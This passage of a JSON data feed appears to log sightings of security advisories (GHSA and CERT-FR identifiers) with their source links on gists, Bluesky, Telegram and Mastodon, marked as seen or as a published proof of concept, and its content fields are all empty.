"type": "published-proof-of-concept", "source": "https://t.me/hacking_Attack/23700", "content": "", "creation_timestamp": "2026-09-07T16:00:05.596938Z"}, {"uuid": "6007e414-81e3-4529-819e-29713dfad636", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-48jh-3gj7-fg8v", "type": "seen", "source": "https://gist.github.com/alon710/895e3529203111e967ac445fa47d3415", "content": "", "creation_timestamp": "2026-09-05T01:31:35.001383Z"}, {"uuid": "8adb36eb-8660-4446-9cd0-bf560d0cc71b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7q9c-hpx7-9cwm", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3muqdfbetv32t", "content": "", "creation_timestamp": "2026-09-05T01:31:02.683700Z"}, {"uuid": "b7dbaaa4-7e34-4fa9-aba3-7a5a301b3c2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7q9c-hpx7-9cwm", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3muqddgpemf2z", "content": "", "creation_timestamp": "2026-09-05T01:30:02.424366Z"}, {"uuid": "798f04a1-82cc-4d79-bc83-26c9b2376b26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rh53-xvx2-j327", "type": "seen", "source": "https://gist.github.com/alon710/e3fcd961ce3e45afd531f9a1d48bb4cf", "content": "", "creation_timestamp": "2026-09-04T23:32:53.723473Z"}, {"uuid": "ad3a908b-ef90-456c-b5c0-e97fc6cb7e8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7q9c-hpx7-9cwm", "type": "seen", "source": "https://gist.github.com/alon710/7b5f9a5f3085441ccfaee4e599346158", "content": "", "creation_timestamp": "2026-09-04T22:33:22.661375Z"}, {"uuid": "cfb418a7-8d99-4c02-aa84-2526be534d22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fgmr-7w36-9qfq", "type": "seen", "source": "https://gist.github.com/alon710/78668aa7363409db44eada4d30afb2b9", "content": "", "creation_timestamp": "2026-09-04T21:32:38.770310Z"}, {"uuid": "1856bb02-9ebb-48ab-b55f-3985e350b0fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wrj3-vj8c-784f", "type": "seen", "source": "https://gist.github.com/alon710/c7af24523c00756cedb6917806c4592c", "content": "", "creation_timestamp": "2026-09-04T20:32:55.516580Z"}, {"uuid": "3927aead-7e43-46ab-b877-887eae88aabd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gx45-xrj5-g6c4", "type": "seen", "source": "https://gist.github.com/alon710/bb4cbf99c94a659593e6b177ff58789d", "content": "", "creation_timestamp": "2026-09-04T19:31:34.988901Z"}, {"uuid": "c1b1fc1f-dc9b-4b75-b372-10be3b1ae2b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w7wx-5q49-r59w", "type": "seen", "source": "https://gist.github.com/alon710/5450dc0367b1b3821398b1bbcad341e1", "content": "", "creation_timestamp": "2026-09-04T18:32:13.515639Z"}, {"uuid": "25efba30-0b3b-4355-a55c-a2da94f6175d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w7wx-5q49-r59w", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3mupk5o3zvd2e", "content": "", "creation_timestamp": "2026-09-04T17:59:23.930183Z"}, {"uuid": "c3e3b5d4-bc81-43c5-a3b6-2c49ec2c6e98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v5mp-jgw5-2x6j", "type": "seen", "source": "https://gist.github.com/alon710/e57ce4bf3882045270fbd4cafb0a7b39", "content": "", "creation_timestamp": "2026-09-04T17:32:58.300544Z"}, {"uuid": "03e27d68-c580-4a42-96b2-3e7c02490ac8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fph3-ghq9-vw66", "type": "seen", "source": "https://gist.github.com/alon710/c2ca54e4a5685bbc943777487cd106b5", "content": "", "creation_timestamp": "2026-09-04T16:32:20.457261Z"}, {"uuid": "2cca00a1-20c7-4e02-8644-7ec28525c762", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v86g-q9cm-h8wp", "type": "seen", "source": "https://gist.github.com/prasanna8585/ffd112b1a125ca4c5533fdce45ef57c1", "content": "", "creation_timestamp": "2026-09-04T16:16:02.606817Z"}, {"uuid": "1a084001-d5c4-4087-9c1b-024768f44205", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-69mh-gvh4-8gp7", "type": "seen", "source": "https://gist.github.com/alon710/9e58c194a5866f9cf4591587a2bfc382", "content": "", "creation_timestamp": "2026-09-04T15:31:59.439834Z"}, {"uuid": "3ba69b17-2767-47be-86be-af18f17aa505", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-V48J-4XGG-4844", "type": "published-proof-of-concept", "source": "https://t.me/hacking_Attack/99459", "content": "", "creation_timestamp": "2026-09-04T15:00:05.206639Z"}, {"uuid": "48671536-6d20-4521-92b1-27b0098d348e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-36v8-mpjm-8j5r", "type": "seen", "source": "https://gist.github.com/alon710/20f1059adcde1e4a5f6beaa48bfa0228", "content": "", "creation_timestamp": "2026-09-04T14:31:53.008090Z"}, {"uuid": "9623cf78-7aad-432b-9685-90f0104180e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2xp9-vwfh-vxw4", "type": "seen", "source": "https://bsky.app/profile/newshoundai.bsky.social/post/3mup4ebo6nc2i", "content": "", "creation_timestamp": "2026-09-04T13:52:33.009902Z"}, {"uuid": "0b9c9159-ea83-4deb-872d-98f8a151d32c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pm3w-vxp9-ccwc", "type": "seen", "source": "https://gist.github.com/alon710/0a73f204f4113f41e2621c39634bb023", "content": "", "creation_timestamp": "2026-09-04T13:04:27.684632Z"}, {"uuid": "dd354712-432c-4e94-ad55-8fa8b1bbe37d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jqgw-vpjc-86fc", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3muozdged6t2x", "content": "", "creation_timestamp": "2026-09-04T12:58:23.303384Z"}, {"uuid": "fa7e8f02-5ffb-4b1e-b1c7-d0b14e588e17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6hwm-xvph-95vm", "type": "seen", "source": "https://gist.github.com/alon710/7b6bce40e6566e480602c24860523089", "content": "", "creation_timestamp": "2026-09-02T09:31:32.845721Z"}, {"uuid": "0e14817e-4524-4be2-b486-4570b84c8640", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8RR7-CVQ3-GMFH", "type": "seen", "source": "https://gist.github.com/alon710/0344ab3ccbb417e183823a5a2477945e", "content": "", "creation_timestamp": "2026-09-02T08:32:19.270504Z"}, {"uuid": "f89dabaf-741a-4871-8cc4-512a07f7dcf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g8qq-57p8-ggw5", "type": "seen", "source": "https://gist.github.com/alon710/b64f54e586f64f04282972c26771d917", "content": "", "creation_timestamp": "2026-09-02T07:31:58.768775Z"}, {"uuid": "0bd5f20d-7759-41fe-a843-551e58070cc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cfqr-cjx5-5jcm", "type": "seen", "source": "https://gist.github.com/alon710/342832b227e98d6656ed29633e96b4ab", "content": "", "creation_timestamp": "2026-09-02T06:32:30.247843Z"}, {"uuid": "b9a6a385-9cf4-4500-ac6d-b5a5bc934a73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C3F5-4G7F-QJQJ", "type": "seen", "source": "https://t.me/HackingTeamGrupoOfficial/47087", "content": "", "creation_timestamp": "2026-09-02T06:00:06.990785Z"}, {"uuid": "0285ed56-05a1-47a7-87c3-4343143b5035", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RCR6-4JQH-J84M", "type": "seen", "source": "https://t.me/HackingTeamGrupoOfficial/48243", "content": "", "creation_timestamp": "2026-09-02T06:00:05.687494Z"}, {"uuid": "546d94a9-ccb0-47e9-b5da-8b122e210878", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jp53-mhqp-8xcg", "type": "seen", "source": "https://gist.github.com/alon710/d55e9844c43e78f042db258784a22ae0", "content": "", "creation_timestamp": "2026-09-02T05:32:13.277199Z"}, {"uuid": "4054f47f-18a7-4426-8028-4782bd623175", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-763m-79hh-57f2", "type": "seen", "source": "https://gist.github.com/alon710/98eba2f66fc3c02fefd49fa02ee5009a", "content": "", "creation_timestamp": "2026-09-02T04:31:59.015582Z"}, {"uuid": "9a04da1e-7775-4ad8-bfc6-a95ac032c9e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9qww-pwc4-77qq", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3muj2f6r4672h", "content": "", "creation_timestamp": "2026-09-02T04:01:18.206434Z"}, {"uuid": "af2751fd-6af3-47ba-800a-125692be0b19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fmgr-6ggq-9859", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3muj2f6r4672h", "content": "", "creation_timestamp": "2026-09-02T04:01:17.692056Z"}, {"uuid": "66b79523-f033-4225-8d12-d9e69b2fd887", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3r4p-g7gg-ppmf", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3muj2f5pmt526", "content": "", "creation_timestamp": "2026-09-02T04:01:16.881054Z"}, {"uuid": "b1f14862-40e4-4587-b61b-2aa92c0db51f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q8g2-wprr-34m9", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3muj2f5pmt526", "content": "", "creation_timestamp": "2026-09-02T04:01:16.848852Z"}, {"uuid": "b01ea980-7323-4ab4-8aa9-3f25781bb319", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2p8c-ff85-vh9x", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3muj2f5pmt526", "content": "", "creation_timestamp": "2026-09-02T04:01:16.813837Z"}, {"uuid": "33dad7ac-ad50-4cc9-aabd-e5ff29876680", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q7rw-r7qq-2hx6", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3muj2f5pmt526", "content": "", "creation_timestamp": "2026-09-02T04:01:16.777958Z"}, {"uuid": "7449bb0b-31f5-4f3d-9599-a9c4ba4badc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-23w6-3w8w-8484", "type": "seen", "source": "https://gist.github.com/alon710/3521e58613b990dddef5bf0335b08c88", "content": "", "creation_timestamp": "2026-09-02T03:31:51.187299Z"}, {"uuid": "4fe18661-0233-49f4-b53b-7d046f65b40e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qw87-v5w3-6vxx", "type": "seen", "source": "https://gist.github.com/tiagovilasboas/cac04abd132dca1c34d611179e8adca5", "content": "", "creation_timestamp": "2026-09-02T03:20:59.367569Z"}, {"uuid": "91fee064-6a9b-46ab-9acc-0b649db5bd0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vx42-ghc9-gw65", "type": "seen", "source": "https://bsky.app/profile/cyberveille-ch.bsky.social/post/3muiwxrtxi32l", "content": "", "creation_timestamp": "2026-09-02T03:00:07.609678Z"}, {"uuid": "507c3f8e-eba6-4ce6-bbf0-cf7dde9481d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-52xp-w8hr-xv3c", "type": "seen", "source": "https://gist.github.com/alon710/82c1345fb72ef5ca8fd6cd81e5d856bc", "content": "", "creation_timestamp": "2026-09-02T02:32:21.871299Z"}, {"uuid": "1abe0344-8670-4e53-b756-8a50afde7fee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xwpv-pqxp-5v36", "type": "seen", "source": "https://gist.github.com/alon710/c47c604ce50ae0fa194515af5d7d206b", "content": "", "creation_timestamp": "2026-09-02T01:32:29.548831Z"}, {"uuid": "5fa0c57e-fd3c-4f78-870b-5dea4b0981b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-68jx-f42c-7599", "type": "seen", "source": "https://bsky.app/profile/thestandup.bsky.social/post/3muiqxcx7yt2y", "content": "", "creation_timestamp": "2026-09-02T01:12:28.870035Z"}, {"uuid": "27bb1649-17ed-4eb1-824d-a4cdf26dc995", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7GHQ-V6JF-G56C", "type": "published-proof-of-concept", "source": "Telegram/LlmxGe0NepodwSEOY074WWsyLFKwhuGisAtYyUzoGwpzcWQ", "content": "", "creation_timestamp": "2026-09-02T01:05:09.119681Z"}, {"uuid": "2e430335-6214-4957-9367-feb11b24223f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MFX4-HV73-Q22V", "type": "published-proof-of-concept", "source": "https://t.me/hacking_Attack/190197", "content": "", "creation_timestamp": "2026-09-02T01:00:24.971980Z"}, {"uuid": "5d887c12-6bb7-44ed-9a25-dbd6dc83dc01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-HJR6-G723-HMFM", "type": "published-proof-of-concept", "source": "https://t.me/hacking_Attack/189047", "content": "", "creation_timestamp": "2026-09-02T01:00:24.226737Z"}, {"uuid": "2e86a527-a8cf-455b-8976-028aa66597b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-575V-8HFQ-M3MC", "type": "published-proof-of-concept", "source": "https://t.me/hacking_Attack/189047", "content": "", "creation_timestamp": "2026-09-02T01:00:24.175870Z"}, {"uuid": "2192f277-4c15-4488-bc1b-4201c0f71462", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9969-8G9H-RXWM", "type": "published-proof-of-concept", "source": "https://t.me/hacking_Attack/189047", "content": "", "creation_timestamp": "2026-09-02T01:00:24.122766Z"}, {"uuid": "7bac0e14-e24a-4e83-83e0-0a8cb1a8411a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-V48J-4XGG-4844", "type": "seen", "source": "https://t.me/hacking_Attack/99459", "content": "", "creation_timestamp": "2026-09-01T20:00:59.345343Z"}, {"uuid": "10edb527-0b68-4d7a-98ed-a00ae685252c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mqjf-5f49-2fjh", "type": "seen", "source": "https://bsky.app/profile/kotosecurity.bsky.social/post/3mu4i4dm7xm2c", "content": "", "creation_timestamp": "2026-08-28T04:02:17.092424Z"}, {"uuid": "578704bd-06b9-42a5-af31-8adac8b0cfcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gvrw-qqp5-jgc5", "type": "seen", "source": "https://gist.github.com/alon710/6538c11be757e60d0a7d8025d09bf775", "content": "", "creation_timestamp": "2026-08-28T02:33:07.958977Z"}, {"uuid": "7f5e6e8f-ea04-420a-8ef7-22da5a731c42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r5pm-vrc5-3m73", "type": "seen", "source": "https://gist.github.com/alon710/95bf554559835da78ddd9ef64b2fd7a2", "content": "", "creation_timestamp": "2026-08-28T01:31:29.600805Z"}, {"uuid": "87c2656d-1ae0-4078-8ad1-08c2db353df9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vxj7-4xrp-5vr4", "type": "seen", "source": "https://gist.github.com/alon710/a5f4630118da96558b479a90bb02c09c", "content": "", "creation_timestamp": "2026-08-28T00:31:38.607405Z"}, {"uuid": "e392c89a-4d12-4ed3-b5f1-8de52ec8b0d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XQ3M-2V4X-88GG", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityExploit/17215", "content": "", "creation_timestamp": "2026-08-28T00:00:29.542397Z"}, {"uuid": "c09dcfbb-c4d0-4b0b-bb16-14e1a3bafd5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X744-4WPC-V9H2", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityExploit/17189", "content": "", "creation_timestamp": "2026-08-28T00:00:11.837247Z"}, {"uuid": "1d8da793-c9a6-46ae-97b7-bfb9ca259899", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6hx8-3wjj-gr8g", "type": "seen", "source": "https://gist.github.com/alon710/3f2dc90a23f10e17e098821e66e18187", "content": "", "creation_timestamp": "2026-08-27T23:33:29.014133Z"}, {"uuid": "e7d3e045-1d7d-4d9d-9ae3-b17f5093e692", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q7m3-rhxg-7vxr", "type": "seen", "source": "https://gist.github.com/alon710/796cb46fa1a6e144f351d5ffd2b774d8", "content": "", "creation_timestamp": "2026-08-27T22:31:50.894045Z"}, {"uuid": "db6bd75d-b060-460d-be1a-8301401bc22a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g7gw-m874-7rmf", "type": "seen", "source": "https://gist.github.com/alon710/14e4e76cd8061b293a52482e75942e6f", "content": "", "creation_timestamp": "2026-08-27T21:32:59.663243Z"}, {"uuid": "94cae6f9-3996-4ac1-91e2-6cbd1a34651c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-39mm-rwm3-29jp", "type": "seen", "source": "https://gist.github.com/alon710/bec19cdcf2926727440026551fd338c7", "content": "", "creation_timestamp": "2026-08-27T20:32:16.430418Z"}, {"uuid": "0078e7fe-93b5-4878-b182-152c9d77bae9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-66H4-QJ4X-38XP", "type": "seen", "source": "https://t.me/CyberSecurityExploit/16968", "content": "", "creation_timestamp": "2026-08-27T20:00:10.472168Z"}, {"uuid": "49a2411f-570b-4a7e-a4a2-a953af0fe87a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X744-4WPC-V9H2", "type": "seen", "source": "https://t.me/CyberSecurityExploit/17189", "content": "", "creation_timestamp": "2026-08-27T20:00:04.645225Z"}, {"uuid": "8a414340-37ae-4b42-84d3-d16d83f6e9c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XQ3M-2V4X-88GG", "type": "seen", "source": "https://t.me/CyberSecurityExploit/17215", "content": "", "creation_timestamp": "2026-08-27T20:00:04.032545Z"}, {"uuid": "a8c9803c-b17c-44de-9e00-58432ec15d85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gmxc-r82q-347r", "type": "seen", "source": "https://gist.github.com/alon710/795619632fe9ba16f51e5c93358e8801", "content": "", "creation_timestamp": "2026-08-27T19:31:53.261786Z"}, {"uuid": "0f2e2510-8c9e-432d-8818-0a8eb3dd1e09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MF7Q-R4RV-JV94", "type": "seen", "source": "https://gist.github.com/alon710/299432ec0cbca6c8eb1a52a0c3b1891c", "content": "", "creation_timestamp": "2026-08-27T18:32:25.138542Z"}, {"uuid": "d52e47ba-c167-478b-a518-08949f12ca48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p293-qw3h-jr36", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/117168467635413172", "content": "", "creation_timestamp": "2026-08-27T16:42:13.399130Z"}, {"uuid": "eeea9637-8821-472b-9f1c-4518a9950f57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3GJW-F78C-VVPW", "type": "seen", "source": "https://gist.github.com/alon710/0cbc434c452f0a0b70aa20e1c14d18f0", "content": "", "creation_timestamp": "2026-08-24T20:31:44.394127Z"}, {"uuid": "7620d508-5abb-4fb2-9955-ee398f488db2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7x63-xv5r-3p2x", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/117151994205661813", "content": "", "creation_timestamp": "2026-08-24T18:52:50.104305Z"}, {"uuid": "c2b4af9b-17b2-4225-abaf-08358cbfe0df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4G7C-P5WG-J4HP", "type": "seen", "source": "https://t.me/bdufstecru/3407", "content": "", "creation_timestamp": "2026-08-24T17:00:04.710746Z"}, {"uuid": "16d6ca1a-01d1-4438-9a99-d3b801485775", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-79H3-6HXJ-G98H", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3405", "content": "", "creation_timestamp": "2026-08-24T17:00:04.635151Z"}, {"uuid": "877057db-b67b-4067-8d70-918d3b45e42b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-GH4H-FX78-Q8XC", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3406", "content": "", "creation_timestamp": "2026-08-24T17:00:04.565041Z"}, {"uuid": "f177aa05-4da5-492c-a138-dde8f6ca6848", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-63CW-57P8-FM3P", "type": "seen", "source": "https://gist.github.com/rahulXs/33981c9d91701115bb44ac406396c782", "content": "", "creation_timestamp": "2026-08-24T15:42:13.394513Z"}, {"uuid": "cdee3dd5-b079-44a6-a819-2b3d6f867e79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VVPJ-8CMC-GX39", "type": "seen", "source": "https://gist.github.com/rahulXs/33981c9d91701115bb44ac406396c782", "content": "", "creation_timestamp": "2026-08-24T15:42:13.368987Z"}, {"uuid": "65e5333d-a2a6-4717-963a-6bc12bf28063", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-036", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/117150469642843401", "content": "", "creation_timestamp": "2026-08-24T12:25:09.558269Z"}, {"uuid": "a446b574-d01c-410a-8d33-e660917c6e2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-036", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mttcdsg5h72k", "content": "", "creation_timestamp": "2026-08-24T12:25:06.733345Z"}, {"uuid": "90c5d760-d5fc-4fb7-935c-239ad17ba725", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 